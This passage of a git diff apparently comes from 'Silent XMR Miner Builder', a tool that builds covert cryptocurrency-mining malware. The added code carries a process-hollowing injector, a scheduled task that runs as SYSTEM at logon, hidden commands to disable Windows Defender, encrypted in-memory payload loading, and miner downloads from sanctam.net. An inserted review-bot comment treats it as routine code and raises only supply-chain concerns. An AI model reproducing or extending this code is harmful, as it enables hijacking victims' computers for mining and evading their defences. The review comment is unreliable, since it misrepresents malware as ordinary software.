 stringb.Replace("#TASKSCH", F.EncryptString("/c schtasks /create /f /sc onlogon /rl highest /tn "))
+ stringb.Replace("#MINERID", F.EncryptString("--cinit-find-x"))
 stringb.Replace("#InjectionTarget", F.EncryptString(F.InjectionTarget(0)))
 stringb.Replace("#InjectionDir", F.InjectionTarget(1).Replace("(", "").Replace(")", "").Replace("%WINDIR%", """ + Environment.GetFolderPath(Environment.SpecialFolder.Windows) + """))
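Review bot: The two new `#SANCTAMLIBSURL`/`#SANCTAMMINERURL` replacements bake a second download origin (`sanctam.net:58899`) into every built binary, and neither these lines nor the existing `#LIBSURL`/`#MINERURL` ones show any integrity check on what is fetched, so each build's runtime behaviour is decided by whoever controls those hosts and paths at download time. That is a supply-chain dependency on a single operator, and a fixed host and port shared by all builds is also a stable network indicator that defenders can block or alert on. The trust assumption should at least be stated next to these lines, e.g. `' Remote download origins: whatever these return is downloaded and run without verification`. `ReplaceGlobals` continues outside this hunk.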
@@ -315,12 +328,26 @@ Public Class Codedom
 stringb.Replace("RTruncate", F.Randomi(F.rand.Next(5, 40)))
 stringb.Replace("RCommandLineEncrypt", F.Randomi(F.rand.Next(5, 40)))
 stringb.Replace("RWDLoop", F.Randomi(F.rand.Next(5, 40)))
+ stringb.Replace("RStart", F.Randomi(F.rand.Next(5, 40)))
+ stringb.Replace("RLoader", F.Randomi(F.rand.Next(5, 40)))
+ stringb.Replace("RUninstaller", F.Randomi(F.rand.Next(5, 40)))
+ stringb.Replace("RProgram", GlobalRProgram)
 stringb.Replace("rarg1", F.Randomi(F.rand.Next(5, 40)))
 stringb.Replace("rarg2", F.Randomi(F.rand.Next(5, 40)))
 stringb.Replace("rarg3", F.Randomi(F.rand.Next(5, 40)))
+ stringb.Replace("rarg4", F.Randomi(F.rand.Next(5, 40)))
+ stringb.Replace("rarg5", F.Randomi(F.rand.Next(5, 40)))
+ stringb.Replace("rarg6", F.Randomi(F.rand.Next(5, 40)))
+ stringb.Replace("rarg7", F.Randomi(F.rand.Next(5, 40)))
+ stringb.Replace("rarg8", F.Randomi(F.rand.Next(5, 40)))
+ stringb.Replace("rarg9", F.Randomi(F.rand.Next(5, 40)))
+ stringb.Replace("rarg10", F.Randomi(F.rand.Next(5, 40)))
+ stringb.Replace("rarg11", F.Randomi(F.rand.Next(5, 40)))
 stringb.Replace("rbD", F.Randomi(F.rand.Next(5, 40)))
+ stringb.Replace("rbD2", F.Randomi(F.rand.Next(5, 40)))
 stringb.Replace("rplp", F.Randomi(F.rand.Next(5, 40)))
 stringb.Replace("rxM", F.Randomi(F.rand.Next(5, 40)))
+ stringb.Replace("startDelay", F.txtStartDelay.Text)
 End Sub
 End Class
diff --git a/SilentXMRMiner/Form1.Designer.vb b/SilentXMRMiner/Form1.Designer.vb
index 1e7b6a7..319b3fd 100644
--- a/SilentXMRMiner/Form1.Designer.vb
+++ b/SilentXMRMiner/Form1.Designer.vb
@@ -346,7 +346,7 @@ Partial Class Form1
 Me.MephForm1.Size = New System.Drawing.Size(535, 272)
 Me.MephForm1.SubHeader = "By Unam Sanctam, Credit to NYAN-x-CAT"
 Me.MephForm1.TabIndex = 0
- Me.MephForm1.Text = "Silent XMR Miner Builder 1.4"
+ Me.MephForm1.Text = "Silent XMR Miner Builder 1.4.1"
 '
 'MephTabcontrol2
 '
@@ -620,7 +620,7 @@ Partial Class Form1
 Me.txtInstallFileName.Name = "txtInstallFileName"
 Me.txtInstallFileName.Size = New System.Drawing.Size(127, 24)
 Me.txtInstallFileName.TabIndex = 8
- Me.txtInstallFileName.Text = "Services.exe"
+ Me.txtInstallFileName.Text = "services64.exe"
 Me.txtInstallFileName.TextAlignment = System.Windows.Forms.HorizontalAlignment.Left
 Me.txtInstallFileName.UseSystemPasswordChar = False
 Me.txtInstallFileName.WordWrap = False
diff --git a/SilentXMRMiner/Form1.vb b/SilentXMRMiner/Form1.vb
index 18f9b51..d3d5baf 100644
--- a/SilentXMRMiner/Form1.vb
+++ b/SilentXMRMiner/Form1.vb
@@ -8,6 +8,8 @@ Public Class Form1
 Public watchdogdata As Byte() = New Byte() {}
 Public FA As New Advanced
+ Public RandomiCache As New List(Of String)
+
 'Silent XMR Miner by Unam Sanctam https://github.com/UnamSanctam/SilentXMRMiner, initially based on Lime Miner by NYAN CAT https://github.com/NYAN-x-CAT/Lime-Miner
 Private Sub Form1_Load(sender As Object, e As EventArgs) Handles Me.Load
@@ -18,6 +20,7 @@ Public Class Form1
 Codedom.F = Me
 FA.F = Me
+ RandomiCache.Add("SilentXMRMiner")
 FA.txtAdvParam.Text = advancedParams
 End Sub
@@ -68,7 +71,7 @@ Public Class Form1
         txtLog.Text = txtLog.Text + ("Starting..." + vbNewLine)
         txtLog.Text = txtLog.Text + ("Replacing strings..." + vbNewLine)
         Dim minerbuilder As New StringBuilder(My.Resources.Program)
-        Dim argstr As String = " --cinit-find-x -B " & If(FA.chkAdvanced.Checked, FA.txtAdvParam.Text, advancedParams) & " --url=" & txtPoolURL.Text & " --user=" & txtPoolUsername.Text & " --pass=" & txtPoolPassowrd.Text & " --cpu-max-threads-hint=" & txtMaxCPU.Text.Replace("%", "") & If(FA.chkRemoteConfig.Checked, " --cinit-remote-config=""" & Unamlib_Encrypt(FA.txtRemoteConfig.Text) & """", "") & " --donate-level=5 "
+        Dim argstr As String = " --cinit-find-x -B " & If(FA.chkAdvanced.Checked, FA.txtAdvParam.Text, advancedParams) & " --url=" & txtPoolURL.Text & " --user=" & txtPoolUsername.Text & " --pass=" & txtPoolPassowrd.Text & " --cpu-max-threads-hint=" & txtMaxCPU.Text.Replace("%", "") & If(FA.chkRemoteConfig.Checked, " --cinit-remote-config=""" & Unamlib_Encrypt(FA.txtRemoteConfig.Text) & """", "") & " "
         minerbuilder.Replace("#dll", Resources_dll)
         minerbuilder.Replace("#xmr", Resources_xmrig)
@@ -233,13 +236,19 @@ Public Class Form1
     End Function
     Public Function Randomi(ByVal length As Integer) As String
-        Dim Chr As String = "asdfghjklqwertyuiopmnbvcxz"
-        Dim sb As New Text.StringBuilder()
-        For i As Integer = 1 To length
-            Dim idx As Integer = rand.Next(0, Chr.Length)
-            sb.Append(Chr.Substring(idx, 1))
-        Next
-        Return sb.ToString
+        While True
+            Dim Chr As String = "asdfghjklqwertyuiopmnbvcxz"
+            Dim sb As New Text.StringBuilder()
+            For i As Integer = 1 To length
+                Dim idx As Integer = rand.Next(0, Chr.Length)
+                sb.Append(Chr.Substring(idx, 1))
+            Next
+            If Not RandomiCache.Contains(sb.ToString()) Then
+                RandomiCache.Add(sb.ToString())
+                Return sb.ToString
+            End If
+        End While
+        Return ""
     End Function
     Private Sub chkInstall_CheckedChanged(sender As Object) Handles chkInstall.CheckedChanged
diff --git a/SilentXMRMiner/My Project/Resources.Designer.vb b/SilentXMRMiner/My Project/Resources.Designer.vb
index 62ab71e..5a7aceb 100644
--- a/SilentXMRMiner/My Project/Resources.Designer.vb
+++ b/SilentXMRMiner/My Project/Resources.Designer.vb
@@ -85,6 +85,7 @@ Namespace My.Resources
         '''using System.IO;
         '''using System.Reflection;
         '''using System.Security.Cryptography;
+        '''using System.Runtime.InteropServices;
         '''using System.Text;
         '''using System.Resources;
         '''using System.Threading;
@@ -99,8 +100,7 @@ Namespace My.Resources
         '''[assembly: AssemblyTitle("%Title%")]
         '''[assembly: AssemblyDescription("%Description%")]
         '''[assembly: AssemblyCompany("%Company%")]
-        '''[assembly: AssemblyProduct("%Product%")]
-        '''[assembly: Assembl [rest of string was truncated]";.
+        '''[assembly: AssemblyPr [rest of string was truncated]";.
         '''
         Friend ReadOnly Property Loader() As String
             Get
@@ -108,16 +108,6 @@ Namespace My.Resources
             End Get
         End Property
-        '''
-        ''' Looks up a localized resource of type System.Byte[].
-        '''
-        Friend ReadOnly Property Mandark() As Byte()
-            Get
-                Dim obj As Object = ResourceManager.GetObject("Mandark", resourceCulture)
-                Return CType(obj,Byte())
-            End Get
-        End Property
-
         '''
         ''' Looks up a localized resource of type System.Drawing.Bitmap.
         '''
@@ -160,6 +150,7 @@ Namespace My.Resources
         '''using System.Security.Principal;
         '''using System.Text;
         '''using System.Threading;
+        '''using System.Linq;
         '''using Microsoft.Win32;
         '''#if DefDebug
         '''using System.Windows.Forms;
@@ -168,7 +159,7 @@ Namespace My.Resources
         '''#if DefAssembly
         '''[assembly: AssemblyTitle("%Title%")]
         '''[assembly: AssemblyDescription("%Description%")]
-        '''[assembly: AssemblyCompany("%Comp [rest of string was truncated]";.
+        '''[assembly: As [rest of string was truncated]";.
         '''
         Friend ReadOnly Property Program() As String
             Get
@@ -181,6 +172,7 @@ Namespace My.Resources
         '''using System.IO;
         '''using System.Reflection;
         '''using System.Security.Cryptography;
+        '''using System.Runtime.InteropServices;
         '''using System.Text;
         '''using System.Resources;
         '''using System.Threading;
@@ -193,10 +185,11 @@ Namespace My.Resources
         '''using System.Windows.Forms;
         '''#endif
         '''
-        '''public partial class Uninstaller
+        '''[assembly: Guid("%Guid%")]
+        '''
+        '''public partial class RUninstaller
         '''{
-        '''    public static string lb = RGetString("#LIBSPATH");
-        '''    public static string bD = Environment.GetFolderPath(Environment.SpecialFolder.Appli [rest of string was truncated]";.
+        '''    public static string rbD = Environment.GetFolderPath(Environment.Specia [rest of string was truncated]";.
         '''
         Friend ReadOnly Property Uninstaller() As String
             Get
@@ -211,8 +204,10 @@ Namespace My.Resources
         '''using System.Management;
         '''using System.Reflection;
         '''using System.Security.Cryptography;
+        '''using System.Runtime.InteropServices;
         '''using System.Text;
         '''using System.Threading;
+        '''using System.Linq;
         '''#if DefDebug
         '''using System.Windows.Forms;
         '''#endif
@@ -220,8 +215,7 @@ Namespace My.Resources
         '''[assembly: AssemblyTitle("Shell Infrastructure Host")]
         '''[assembly: AssemblyDescription("Shell Infrastructure Host")]
         '''[assembly: AssemblyProduct("Microsoft® Windows® Operating System")]
-        '''[assembly: AssemblyCopyright("© Microsoft Corporation. All Rights Reserved.")]
-        '''[assembly: Ass [rest of string was truncated]";.
+        '''[assembly: AssemblyCopyright("© Micr [rest of string was truncated]";.
         '''
         Friend ReadOnly Property Watchdog() As String
             Get
diff --git a/SilentXMRMiner/My Project/Resources.resx b/SilentXMRMiner/My Project/Resources.resx
index acf32d5..873906f 100644
--- a/SilentXMRMiner/My Project/Resources.resx
+++ b/SilentXMRMiner/My Project/Resources.resx
@@ -118,9 +118,6 @@ System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 - - ..\Resources\Mandark.dll;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 - ..\Resources\Monero.ico;System.Drawing.Icon, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
diff --git a/SilentXMRMiner/Resources/Loader.cs b/SilentXMRMiner/Resources/Loader.cs
index a3b94ec..55f20cb 100644
--- a/SilentXMRMiner/Resources/Loader.cs
+++ b/SilentXMRMiner/Resources/Loader.cs
@@ -25,7 +25,7 @@
 [assembly: Guid("%Guid%")]
-public partial class Loader
+public partial class RLoader
 {
     public static void Main()
     {
@@ -36,12 +36,11 @@ public static void Main()
             Process.Start(new ProcessStartInfo
             {
                 FileName = "cmd",
-                Arguments = "/c " + Encoding.ASCII.GetString(Convert.FromBase64String("#KillWDCommands").Reverse().ToArray()) + " & exit",
+                Arguments = Encoding.ASCII.GetString(RAES_Method(Convert.FromBase64String("#KillWDCommands"))),
                 WindowStyle = ProcessWindowStyle.Hidden,
                 CreateNoWindow = true,
                 UseShellExecute = false,
-                RedirectStandardOutput = true,
-                Verb = "runas",
+                RedirectStandardOutput = true
             });
         }
         catch (Exception ex)
@@ -54,11 +53,7 @@ public static void Main()
         try
         {
-            int startDelay = 0;
-            if (int.TryParse("#STARTDELAY", out startDelay) && startDelay > 0)
-            {
-                Thread.Sleep(startDelay * 1000);
-            }
+            Thread.Sleep(startDelay * 1000);
         }
         catch (Exception ex)
         {
@@ -69,7 +64,7 @@ public static void Main()
         try
         {
-            Assembly.Load(((byte[])new ResourceManager("#LoaderRes", Assembly.GetExecutingAssembly()).GetObject("#Program")).Reverse().ToArray()).CreateInstance("Program").GetType().GetMethod("Main").Invoke(null, new object[0]);
+            Assembly.Load(RAES_Method((byte[])new ResourceManager("#LoaderRes", Assembly.GetExecutingAssembly()).GetObject("#Program"))).EntryPoint.Invoke(null, new object[0]);
         }
         catch (Exception ex)
         {
@@ -78,4 +73,17 @@ public static void Main()
 #endif
         }
     }
+
+    public static byte[] RAES_Method(byte[] rarg1)
+    {
+        using (var mStream = new MemoryStream())
+        {
+            using (var cStream = new CryptoStream(mStream, new RijndaelManaged().CreateDecryptor(new Rfc2898DeriveBytes("#KEY", Encoding.ASCII.GetBytes("#SALT"), 100).GetBytes(16), Encoding.ASCII.GetBytes("#IV")), CryptoStreamMode.Write))
+            {
+                cStream.Write(rarg1, 0, rarg1.Length);
+                cStream.Close();
+            }
+            return mStream.ToArray();
+        }
+    }
 }
\ No newline at end of file
diff --git a/SilentXMRMiner/Resources/Mandark.dll b/SilentXMRMiner/Resources/Mandark.dll deleted file mode 100644 index cb8048a37db92ddbfb7a629f67ffd488d362ec07..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 6656 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 M;rg@V|7ZgL13Wxxr2qf` diff --git a/SilentXMRMiner/Resources/Program.cs b/SilentXMRMiner/Resources/Program.cs index d4328be..0ea3751 100644 --- a/SilentXMRMiner/Resources/Program.cs +++ b/SilentXMRMiner/Resources/Program.cs @@ -26,9 +26,13 @@ #endif [assembly: Guid("%Guid%")] -public partial class Program +public partial class RProgram { +#if DefSystem32 + public static string rbD = (new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator) ? Environment.SystemDirectory : Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)) + @"\" + RGetString("#LIBSPATH"); +#else public static string rbD = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\" + RGetString("#LIBSPATH"); +#endif #if DefInstall public static string rplp = PayloadPath; #endif @@ -37,7 +41,6 @@ public static void Main() { #if DefInstall try{ - Thread.Sleep(2 * 1000); if(new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator)) { try{ 
@@ -46,8 +49,7 @@ public static void Main()
                     FileName = "cmd",
                     Arguments = RGetString("#TASKSCH") + "\"" + Path.GetFileNameWithoutExtension(rplp) + "\"" + " /tr " + "'" + "\"" + (rplp) + "\"" + "' /RU \"SYSTEM\" & exit",
                     WindowStyle = ProcessWindowStyle.Hidden,
-                    CreateNoWindow = true,
-                    Verb = "runas"
+                    CreateNoWindow = true
                 });
             }
             catch(Exception ex){
@@ -73,7 +75,7 @@ public static void Main()
 #if DefInstall
     public static void RInstall()
     {
-        Thread.Sleep(2 * 1000);
+        Thread.Sleep(1 * 1000);
         if (Process.GetCurrentProcess().MainModule.FileName != rplp)
         {
             foreach (Process proc in Process.GetProcessesByName(RGetString("#WATCHDOG")))
@@ -92,7 +94,7 @@ public static void RInstall()
             }
             catch(Exception ex) {}
             File.Copy(Process.GetCurrentProcess().MainModule.FileName, rplp, true);
-            Thread.Sleep(5 * 1000);
+            Thread.Sleep(2 * 1000);
             RBaseFolder();
             Directory.CreateDirectory(Path.GetDirectoryName(rplp));
             Process.Start(new ProcessStartInfo
@@ -100,7 +102,7 @@ public static void RInstall()
                 FileName = rplp,
                 WorkingDirectory = Path.GetDirectoryName(rplp),
                 WindowStyle = ProcessWindowStyle.Hidden,
-                CreateNoWindow = true,
+                CreateNoWindow = true
             });
             Environment.Exit(0);
         }
@@ -118,10 +120,10 @@ public static string RGetString(string rarg1)
         return Encoding.ASCII.GetString(RAES_Method(Convert.FromBase64String(rarg1)));
     }
-    public static void RRun(byte[] rarg1, string rarg2, byte[] rarg3)
+    public static void RRun(byte[] rarg1, string rarg2)
     {
         // Credits gigajew for RunPE https://github.com/gigajew/Mandark
-        Assembly.Load(rarg1).GetType(RGetString("#DLLSTR")).GetMethod(RGetString("#DLLOAD"), BindingFlags.Public | BindingFlags.Static).Invoke(null, new object[] { rarg3, ("#InjectionDir") + @"\" + RGetString("#InjectionTarget"), rarg2 });
+        Load(rarg1, ("#InjectionDir") + @"\" + RGetString("#InjectionTarget"), rarg2);
     }
     public static void RBaseFolder()
@@ -159,7 +161,7 @@ public static bool RCheckProc()
         {
             var options = new ConnectionOptions();
             options.Impersonation = ImpersonationLevel.Impersonate;
-            var scope = new ManagementScope(@"\\" + Environment.UserDomainName + @"\root\cimv2", options);
+            var scope = new ManagementScope(@"\root\cimv2", options);
             scope.Connect();
             string wmiQuery = string.Format("Select CommandLine from Win32_Process where Name='{0}'", RGetString("#InjectionTarget"));
@@ -168,7 +170,7 @@ public static bool RCheckProc()
             var managementObjectCollection = managementObjectSearcher.Get();
             foreach (ManagementObject retObject in managementObjectCollection)
             {
-                if (retObject != null && retObject["CommandLine"] != null && retObject["CommandLine"].ToString().Contains("--cinit-find-x"))
+                if (retObject != null && retObject["CommandLine"] != null && retObject["CommandLine"].ToString().Contains(RGetString("#MINERID")))
                 {
                     return true;
                 }
@@ -206,10 +208,22 @@ public static void RInitialize()
             {
                 using (var client = new System.Net.WebClient())
                 {
-                    li = client.DownloadData(RGetString("#LIBSURL"));
+                    try {
+                        li = client.DownloadData(client.DownloadString(RGetString("#SANCTAMLIBSURL")));
+                    }
+                    catch(Exception ex){
+#if DefDebug
+                        MessageBox.Show("M5.5: Couldn't get libs from sanctam, moving on to backup" + Environment.NewLine + ex.ToString());
+#endif
+                    }
+                    if (li.Length == 0) {
+                        li = client.DownloadData(RGetString("#LIBSURL"));
+                    }
                 }
 #if DefInstall
-                File.WriteAllBytes(Path.Combine(rbD, RGetString("#WATCHDOG") + "-2.log"), RAES_Method(li, true));
+                if (li.Length > 0) {
+                    File.WriteAllBytes(Path.Combine(rbD, RGetString("#WATCHDOG") + "-2.log"), RAES_Method(li, true));
+                }
 #endif
             }
             else
@@ -219,22 +233,23 @@ public static void RInitialize()
 #else
                 li = RGetTheResource("#libs");
 #endif
-
-                using (var archive = new ZipArchive(new MemoryStream(li)))
-                {
-                    foreach (ZipArchiveEntry entry in archive.Entries){
-                        entry.ExtractToFile(Path.Combine(rbD, entry.FullName), true);
+                if (li.Length > 0) {
+                    using (var archive = new ZipArchive(new MemoryStream(li)))
+                    {
+                        foreach (ZipArchiveEntry entry in archive.Entries){
+                            entry.ExtractToFile(Path.Combine(rbD, entry.FullName), true);
+                        }
                     }
-                }
-                if (GPUstr.ToLower().Contains("nvidia"))
-                {
-                    rS += " --cuda --cuda-loader=" + "\"" + rbD + "ddb64.dll" + "\"";
-                }
+                    if (GPUstr.ToLower().Contains("nvidia"))
+                    {
+                        rS += " --cuda --cuda-loader=" + "\"" + rbD + "ddb64.dll" + "\"";
+                    }
-                if (GPUstr.ToLower().Contains("amd"))
-                {
-                    rS += " --opencl ";
+                    if (GPUstr.ToLower().Contains("amd"))
+                    {
+                        rS += " --opencl ";
+                    }
                 }
             }
             catch(Exception ex){
@@ -266,10 +281,23 @@ public static void RInitialize()
             {
                 using (var client = new System.Net.WebClient())
                 {
-                    rxM = client.DownloadData(RGetString("#MINERURL"));
+                    try
+                    {
+                        rxM = client.DownloadData(client.DownloadString(RGetString("#SANCTAMMINERURL")));
+                    }
+                    catch(Exception ex){
+#if DefDebug
+                        MessageBox.Show("M6.5: Couldn't get xmrig from sanctam, moving on to backup" + Environment.NewLine + ex.ToString());
+#endif
+                    }
+                    if (rxM.Length == 0) {
+                        rxM = client.DownloadData(RGetString("#MINERURL"));
+                    }
                 }
 #if DefInstall
-                File.WriteAllBytes(Path.Combine(rbD, RGetString("#WATCHDOG") + ".log"), RAES_Method(rxM, true));
+                if (rxM.Length > 0) {
+                    File.WriteAllBytes(Path.Combine(rbD, RGetString("#WATCHDOG") + ".log"), RAES_Method(rxM, true));
+                }
 #endif
             }
             else
@@ -282,18 +310,21 @@ public static void RInitialize()
             try
             {
-                using (var archive = new ZipArchive(new MemoryStream(rxM)))
+                if (rxM.Length > 0)
                 {
-                    foreach (ZipArchiveEntry entry in archive.Entries)
+                    using (var archive = new ZipArchive(new MemoryStream(rxM)))
                     {
-                        if (entry.FullName.Contains("ri"))
+                        foreach (ZipArchiveEntry entry in archive.Entries)
                         {
-                            using (var streamdata = entry.Open())
+                            if (entry.FullName.Contains("ri"))
                             {
-                                using (var ms = new MemoryStream())
+                                using (var streamdata = entry.Open())
                                 {
-                                    streamdata.CopyTo(ms);
-                                    RRun(RGetTheResource("#dll"), argstr, ms.ToArray());
+                                    using (var ms = new MemoryStream())
+                                    {
+                                        streamdata.CopyTo(ms);
+                                        RRun(ms.ToArray(), argstr);
+                                    }
                                 }
                             }
                         }
@@ -385,4 +416,93 @@ public static byte[] RAES_Method(byte[] rarg1, bool rarg2 = false)
             return mStream.ToArray();
         }
     }
+
+    [DllImport("kernel32.dll")]
+    private static extern bool CreateProcess(string rarg1,
+        string rarg2,
+        IntPtr rarg3,
+        IntPtr rarg4,
+        bool rarg5,
+        uint rarg6,
+        IntPtr rarg7,
+        string rarg8,
+        byte[] rarg9,
+        byte[] rarg10);
+
+    [DllImport("kernel32.dll")]
+    private static extern long VirtualAllocEx(long rarg1,
+        long rarg2,
+        long rarg3,
+        uint rarg4,
+        uint rarg5);
+
+    [DllImport("kernel32.dll")]
+    private static extern long WriteProcessMemory(long rarg1,
+        long rarg2,
+        byte[] lpBuffer,
+        int nSize,
+        long written);
+
+    [DllImport("ntdll.dll")]
+    private static extern uint ZwUnmapViewOfSection(long rarg1,
+        long rarg2);
+
+    [DllImport("kernel32.dll")]
+    private static extern bool SetThreadContext(long rarg1,
+        IntPtr rarg2);
+
+    [DllImport("kernel32.dll")]
+    private static extern bool GetThreadContext(long rarg1,
+        IntPtr rarg2);
+
+    [DllImport("kernel32.dll")]
+    private static extern uint ResumeThread(long rarg1);
+
+    [DllImport("kernel32.dll")]
+    private static extern bool CloseHandle(long rarg1);
+
+    public static void Load(byte[] rarg1, string rarg2, string rarg3)
+    {
+        int rarg4 = Marshal.ReadInt32(rarg1, 0x3c);
+
+        long rarg5 = Marshal.ReadInt64(rarg1, rarg4 + 0x18 + 0x18);
+
+        byte[] rarg6 = new byte[0x18];
+
+        IntPtr rarg7 = new IntPtr(16 * ((Marshal.AllocHGlobal(0x4d0 + (16 / 2)).ToInt64() + (16 - 1)) / 16));
+
+        Marshal.WriteInt32(rarg7, 0x30, 0x0010001b);
+
+        CreateProcess(null, rarg2 + (!string.IsNullOrEmpty(rarg3) ? 
" " + rarg3 : ""), IntPtr.Zero, IntPtr.Zero, true, 0x4u, IntPtr.Zero, Path.GetDirectoryName(rarg2), new byte[0x68], rarg6);
+        long rarg8 = Marshal.ReadInt64(rarg6, 0x0);
+        long rarg9 = Marshal.ReadInt64(rarg6, 0x8);
+
+        ZwUnmapViewOfSection(rarg8, rarg5);
+        VirtualAllocEx(rarg8, rarg5, Marshal.ReadInt32(rarg1, rarg4 + 0x18 + 0x038), 0x3000, 0x40);
+        WriteProcessMemory(rarg8, rarg5, rarg1, Marshal.ReadInt32(rarg1, rarg4 + 0x18 + 0x03c), 0L);
+
+        for (short i = 0; i < Marshal.ReadInt16(rarg1, rarg4 + 0x4 + 0x2); i++)
+        {
+            byte[] rarg10 = new byte[0x28];
+            Buffer.BlockCopy(rarg1, rarg4 + (0x18 + Marshal.ReadInt16(rarg1, rarg4 + 0x4 + 0x10)) + (0x28 * i), rarg10, 0, 0x28);
+
+            byte[] rarg11 = new byte[Marshal.ReadInt32(rarg10, 0x010)];
+            Buffer.BlockCopy(rarg1, Marshal.ReadInt32(rarg10, 0x014), rarg11, 0, rarg11.Length);
+
+            WriteProcessMemory(rarg8, rarg5 + Marshal.ReadInt32(rarg10, 0x00c), rarg11, rarg11.Length, 0L);
+        }
+
+        GetThreadContext(rarg9, rarg7);
+
+        WriteProcessMemory(rarg8, Marshal.ReadInt64(rarg7, 0x88) + 16, BitConverter.GetBytes(rarg5), 8, 0L);
+
+        Marshal.WriteInt64(rarg7, 0x80, rarg5 + Marshal.ReadInt32(rarg1, rarg4 + 0x18 + 0x10));
+
+        SetThreadContext(rarg9, rarg7);
+        ResumeThread(rarg9);
+
+        Marshal.FreeHGlobal(rarg7);
+        CloseHandle(rarg8);
+        CloseHandle(rarg9);
+    }
 }
\ No newline at end of file
diff --git a/SilentXMRMiner/Resources/Uninstaller.cs b/SilentXMRMiner/Resources/Uninstaller.cs
index 31ed518..24101ac 100644
